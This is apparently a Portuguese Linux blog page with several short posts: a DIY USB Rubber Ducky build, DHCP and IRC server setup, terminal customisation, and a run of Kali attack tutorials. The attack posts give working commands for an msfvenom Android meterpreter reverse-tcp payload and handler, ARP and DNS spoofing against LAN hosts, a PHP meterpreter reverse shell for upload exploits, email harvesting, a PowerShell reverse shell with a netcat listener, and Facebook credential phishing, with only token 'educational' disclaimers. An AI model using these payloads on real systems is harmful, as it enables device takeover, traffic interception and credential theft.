Linux em Geral

Linux em Geral

Linux em todos os seus sabores

ARDUINO PRO MICRO + CARTÃO DE MEMORIA = USB RUBBER DUCKY COM EXCELENTES FUNCIONALIDADES

0

Imagine você com R$34,00 criar uma ferramenta bem semelhante ao Usb Rubber Ducky que hoje é vendido no Brasil por no minimo R$500. Agora imagine que nós iremos ver como fazer isso de uma forma simples, pratica e bem funcional.

 

Assunto de Hoje: Transforme seu Pro micro em uma poderosíssima ferramenta de testes de intrusão.
Com o dólar lá nas alturas e até mesmo com o interesse em criar você mesmo novas ferramentas as vezes somos colocados frente a situações que acabamos por economizar muitos ‘Termes'(R$). Além claro de passar divertidos momentos brincando com aquilo que mais gostamos.

Veja o Vídeo:

Nesse tutorial/Artigo/Receita de bolo nós iremos ver como fazer isso. Aconselho ver o vídeo para melhor entendimento do assunto abordado, pois lá eu tento dar detalhes do uso e simplifico as ações realizadas para construir esse brinquedinho.

 


Para isso precisaremos de:

  1. Arduino Pro Micro
  2. Leitor/Adaptador de cartão SD
  3. Um cartão Micro SD.

Com o material em mãos, a parte mais chata é realizar a soldagem, eu pelo menos por ter um problema nos nervos dos braços estou tremendo muito, o que me impede de realizar uma soldagem cirúrgica. Porém, por menos bonito que seja ainda assim consigo fazer alguns itens se tornarem funcionais.

Nesse caso, iremos ligar o Arduino diretamente ao leitor/adaptador de cartão, a sequencia de solda para os pinos são:

Sequencia

Depois de realizar a solda dos devidos pinos a seus respectivos pares devemos realizar um teste para verificar se tudo correu bem. Caso sim, ai iremos para o próximo passo.

Para fazer o teste eu indico que você use o seguinte código, esse disponível diretamente do Arduino.CC .

Segue o código:

Se após enviar o código para o Arduino e ele gravar no seu cartão SD um arquivo(como o default do cod.) chamado ‘TESTE.TXT e nele escrever a seguinte linha: “testing 1, 2, 3.” então, todos os seus passos anteriores foram feitos com sucesso e já pode ir para a próxima etapa.
Importante observar a linha 16, onde está :   if (!SD.begin(4)) {

Se feito de acordo com a sequencia de conexão acima então, obrigatoriamente deve-se usar o pino 10 onde está a atribuição do valor 4. Caso tenha usado o 4, nada precisa ser mudado.

 

Nesta Etapa daremos inicio a compilação do codigo que será o interpretador dos nossos scripts.
Para isso, basta entrarmos em : https://github.com/Seytonic/Duckduino-microSD e posteriormente clonar ou fazer download do projeto que está disponível. Algo bem semelhante a :
$git clone https://github.com/Seytonic/Duckduino-microSD.git

Após isso, entre no diretório recém criado, dentro dele vá em Duckduino-microSD e veja que só existe um arquivo, este com o nome de Duckduino-microSD.ino

 

Feito os passos acima, abra o IDE do Arduino, procure pelo arquivo .ino baixado e abra para que possa compilar e enviar ao Arduino. Feito isso, só precisaremos de entender agora como irá funcionar o nosso Sistema.

O Arduino então está programado para realizar a interpretação de comandos pre-estabelecidos e que estejam em um arquivo que é referenciado no código carreado.

 

Assim que conectamos o cabo ao pc, o arduino faz a leitura do arquivo no cartão, interpreta e executa isso.
Ou seja, o nosso Arduino é praticamente um USB R. Ducky, só temos menos processamento, mas na pratica o funcionamento é 90% ou mais similar.
Para que possamos fazer os scripts nós deveremos seguir uma sintaxe bem diferente da apresentada no vídeo anterior, desta vez usaremos praticamente o que é usado no próprio Rubber, ou seja, poderemos com pequenas alterações fazer com que nosso arduino execute as centenas de códigos já disponíveis, ou, criar os nossos próprios. Isso irá variar com certeza.
Um código usado por mim que tem basicamente a mesma função do outro vídeo é:

Para testar numa live, acesse, http://seytonic.com.
Caso deseje pode também clonar direto na sua maquina, o link para download é o seguinte:
https://github.com/Nurrl/Duckuino

Vejam só o quanto ele diminui de tamanho. Fica muito show 😉

Bom, agora o que nos resta é copiar esse código para o cartão de memoria. Após copiar para o cartão você espeta no leitor/adaptador e com um cabo USB apropriado, conectar ao PC.

Esse modelo de executar os scripts simplifica e ao mesmo tempo facilita e muito a criação e edição dos nossos ‘programas’. Isso é muito simples, funcional e pratico.
Link para os scripts já existentes do USB Rubber Ducky : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

 

Então pessoal, é isso.
Até a próxima.

 

Exploit Android 6 usando MSFvenom (Kali 2.2016)

0

Gente, nesse video eu mostro como com poucos comandos você pode explorar um Android na versão 6.0.
O video não tem intenção de ensinar ou induzir ninguém a invadir a privacidade de terceiros, mas sim demonstrar que falhas podem ser exploradas.

Usei apenas o msfvenom sem opções de encoder, arquitetura ou outros, basicamente apenas um exploit gerado pelo kali e que me deu acesso de forma reversa ao Android.
Aparelho : Moto G segunda Geração com android 6.0 com ultima atualização de segurança instalado.

Comandos usado neste video…
Criar o exploit, substitua ip pelo seu ip, porta pela devida porta e de o nome do app:
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=PORTA -o app.apk

Para estabelecer conexão :
msfconsole

use multi/handler

set payload android/meterpreter/reverse_tcp

set lhost IP_KALI

set lport porta

exploit -j ou run ou somente exploit

Bom, por hoje é só, logo mais mostro como deixar este exploit como algo que inicia todas as vezes que o dispositivo for ligado, obtendo assim um acesso monstro ao Android….rsrs
abraços

 

 

 

DnsSpoof e ArpSpoof kali Linux

0

Boas Users!

Vamos falar um pouco hoje de dnsspoof e arpspoof,  técnica utilizada em redes cabeadas e wireless que permite ao atacante capturar informações

Comandos:

# arpspoof -i eth0 -t 192.168.1.119 -r 192.168.1.120
# dnsspoof -i eth0
# dnsspoof -i eth0 -f dns.txt

Isso foi uma pequena demostração  do que o dnsspoof e arpspoof é capaz de fazer.

 

By user777

 

 

Criando Servidor IRC no Kali Linux “InspiRCD”

0

Boas Users!

Vamos instalar o InspIRCd no kali

1- Basta abrir o terminal e inserir o seguinte comando;

#apt-get install inspircd

2-  Agora à configuração. Para tal vamos abrir o ficheiro /etc/inspircd/inspircd.conf onde devem realizar as seguintes configurações:

OBS: usarei o editor de texto “vi”, você poderá usar o editor de texto de seu gosto.

#vi /etc/inspircd/inspircd.conf

Ao nível do servidor, devem alterar os seguintes dados:

Server name
Description
Network

Configure de acordo com suas informações.

Captura de tela de 2016-07-21 00-25-10
3- Ao nível da administração,  devem  alterar os seguintes dados de acordo com a conta que pretendam criar.
Admin
Nick
Email
Captura de tela de 2016-07-21 00-25-30
4- Em termos de servidor, devem também indicar a partir de qual endereço é que o mesmo está disponível. No exemplo da imagem seguinte, consideramos o endereço 177.154.11.100 e porta 6667.
Captura de tela de 2016-07-21 00-25-50
5- O próximo passo é definir uma password  necessária para parar ou reiniciar o serviço.
Captura de tela de 2016-07-21 00-26-19
6- Vamos agora criar um conta de operador. Para tal basta procurarem pela linha que começa por <oper name=…, dentro do ficheiro de configuração.
Captura de tela de 2016-07-21 00-26-46
7- salve o arquivo e iniciei o serviço usando o comando
#service inspircd start

Estas são as configurações mínimas para que o InspIRCd funcione. No entanto há muitos outros parâmetros que podem ser consultados aqui.

Coletando Endereços de Email’s com Kali Linux

0

Boas Users!

Vou mostrar como coletar, endereços de email’s de um determinado domínio.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos usado:

# msfconsole

msfconsole= Framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

 

 

[ x ]
 

msf > use auxiliar/gather/search_email_collector

use auxiliar= Carregando o modulo email_collector

msf > set DOMAIN "domínio.com.br"

set DOMAIN= Selecionando o domínio

msn > run

run= Iniciando a coleta

 

 

Servidor DHCP CentOS

0

Boas Users!

Vou mostrar como configurar um servidor DHCP, no CentOS 7.

 

Comandos:

# su -

su –= ativa o super usuário “root”

# yum update

yum= é uma ferramenta utilizada para gerenciar a instalação e remoção de pacotes em distribuições Linux, que utilizam o sistema RPM.

update= Atualiza o sistema de arquivos.

# yum install dhcpd

install= Instala

# systemctl enable dhcpd

systemctl= Ferramenta para gerenciar serviços

enable= Habilita

# systemctl start dhcpd

start= inicia

# ifconfig

ifconfig= é usado para atribuir um endereço para uma interface e/ou configurar parâmetros de interface de rede

# vi /etc/sysconfig/network-scripts/ifcfg-enp0s3

vi= Editor de texto

OBS: Lembrando que “enp0s3” é a placa de rede gerada “virtualbox”, substitua pela placa de rede do seu computador.

DEVICE=enp0s3
BOOTPROTO=static
BROADCAST=192.168.1.255
IPDDR=192.168.1.128
NETMASK=255.255.255.0
GATEWAY=192.168.1.254
NETWORK=192.168.1.0
ONBOOT=yes
TYPE=Ethernet
PEERDNS=no

DEVICE= Identificação da placa de rede “nome”

BOOTPROTO= static “ip fixo” ou Dynamic “ip recebido pelo servidor DHCP”

IPADDR= Aqui colocamos o “IP”

NETMASK= Mascara da rede

GATEWAY= é uma máquina intermediária geralmente destinada a interligar redes, separar domínios de colisão, ou mesmo traduzir protocolos.

NETWORK= Faixa de IP`s

ONBOOT= yes > ativa placa de rede, no > não ativa a placa de rede no boot

PEERDNS= responsável por gerar o DNS no arquivo “/etc/resolv.conf”

# vi /etc/sysconfig/network-scripts/ifcfg-enp0s8

enp0s8= Placa de rede, que vai distribuir internet.

# service network restart

Reiniciando a rede

DEVICE=enp0s8
BOOTPROTO=static
BROADCAST=10.0.0.255
IPADDR=10.0.0.1
NETMASK=255.0.0.0
NETWORK=10.0.0.0
GATEWAY=10.0.0.1
ONBOOT=yes
# vi /etc/resolv.conf

aqui configuramos o DNS:

nameserver 192.168.1.1

OBS: pode ser o seu DNS preferido, ex: 8.8.8.8 ou 8.8.4.4, que são os DNS do google.

# vi /etc/dhcpd/dhcpd.conf

Configuração do arquivo DHCP:

default-lease-time 600;
max-lease-time 7200;
authoritative;

subnet 10.0.0.0 netmask 255.0.0.0 {
range dynamic-bootp 10.0.0.100 10.0.0.200;
option domain-name-servers 8.8.8.8, 8.8.4.4;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
}

default-lease-time = Controla o tempo de renovação dos endereços de IP´s

max-lease-time = determina o tempo máximo que uma estação pode usar um determinado IP.

authoritative= Terminais mesmo que estes possuam, configurações erradas de rede, ou possuam IPs que não sejam da subnet configurada no servidor.

subnet= classe de ip

range dynamic-bootp= IP’s que seraão liberados

option domain-name-servers=  É um computador com uma espécie de banco de dados que relaciona o endereço “nominal” de um site como www.uol.com.br com o endereço real onde está a página na rede, para poder acessá-la.

option domain-broadcast-adrress=

option routers= rota do tráfego

Agora vamos criar um script do roteamento, para liberar internet.

# vi /usr/bin/firewall

OBS: pode criar com o nome de sua preferência, no meu caso criei “firewall”.

#!/bin/bash
iptables -F 
iptables -t filter -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -s 10.0.0.0/255.0.0.0 -o enp0s3 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -s 10.0.0.0/12 -j ACCEPT
iptables -A FORWARD -d 10.0.0.0/12 -j ACCEPT

iptables= é o nome da ferramenta do espaço do usuário que permite a criação de regras de firewall e NATs.

-F= apaga todas as regras

-t= parâmetro tabela

-P= define uma regra padrão

-A=acrescenta uma nova regra às existentes

-s= especifica a origem do pacote. Origem que pode ser informada como

-o= identifica a interface de saída do pacote, com a mesma sintaxe descrita acima em -i

FORWARD= consultado para dados que são redirecionados para outra interface de rede ou outra máquina

POSTROUTING= consultado para os dados que precisam ser modificados logo que chegam (DNAT e redirecionamento de portas)

ACCEPT= O pacote é ACEITO e o processamento das regras daquele chains é concluído

filter= nome da tabela

# chmod +x /usr/bin/firewall

chmod= é um utilitário via linha de comando usado nos sistemas Linux/Unix/Unix-like para mudar as permissões de um arquivo ou diretório.

+= adiciona

x= execução

# vi /etc/rc.d/rc.local

Agora vamos adicionar na ultima linha, do arquivo “rc.local” para iniciar o script “firewall” no boot.

 

 

[ x ]
 

bash /usr/bin/firewall

salve e assim, estará rodando o seu servidor. Boa Sorte!

Download dos arquivos de configurações do CentOS aqui.

em relação ao editor de texto “vi”, quem não está familiarizado, consulte aqui.

 

By user777

 

 

 

Explorando Vulnerabilidade de “upload” com BURP “kali linux”

0

Boas users!

Irei mostrar como explorar uma vulnerabilidade, de um determinado servidor de upload com o BURP.

Comando:

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -e      php/base64 -f raw > /root/upload.php

By user777

 

Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

Invadindo com Power Shell kali Linux

0

Boas Users!

Vou demonstrar mais uma vulnerabilidade “sistemas Windows”

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Comandos Utilizados:

# apt-get install npm build-essential g++ xsel
# npm install -g n
# npm config set registry http://registry.npmjs.org/
# n latest
# git clone https://github.com/gabemarshall/Brosec.git

git clone = Faz o download do Brosec

# cd Brosec && npm install

cd Brosec && npm install = Entra no diretório Brosec e instala p npm

# ./bros

./bros = Iniciando o script

# set LHOST (seu IP)

LHOST = IP do atacante

# set LPORT 4444

LPORT = Porta utilizada

# 5

5 = Miscellaneos que significa “Variado”

# 1

1 = Reverse shell

# 4

4 = Reverse Shell PSH

# N

N = “Não” “Should I start a tcp listener on port for you”

# netcat -lnp 4444 -vv

Iniciando o serviço

 

Fonte: https://github.com/gabemarshall/Brosec

 

By user777

 

 

 

 

Personalizando terminal “Kali Linux”

0

Boas Users!

Hoje vou ensinar, como personalizar o terminal do kali linux, muito simples.

 

Comandos Utilizados:

Antes de mais nada, entrar no diretório inicial do usuário:

# cd ~
# leafpad .user777

leafpad = editor de texto padrão do kali linux

.user777= nome do arquivo que escolhi, coloque o nome que achar melhor, mas não esquecendo do (.) ponto no inicio do arquivo, assim ele fica oculto no sistema.

# chmod +x

chmod= gerencia as permissões no linux

+x= Permissão de execução

# leafpad .bashrc

.bashrc= Arquivo do terminal

# cat ~/.user777

cat= lista um arquivo na tela

~= diretório inicial do usuário

Links dos geradores:

http://patorjk.com/software/taag/#p=d

http://joshua.einhyrning.com/wtfig/

 

By user777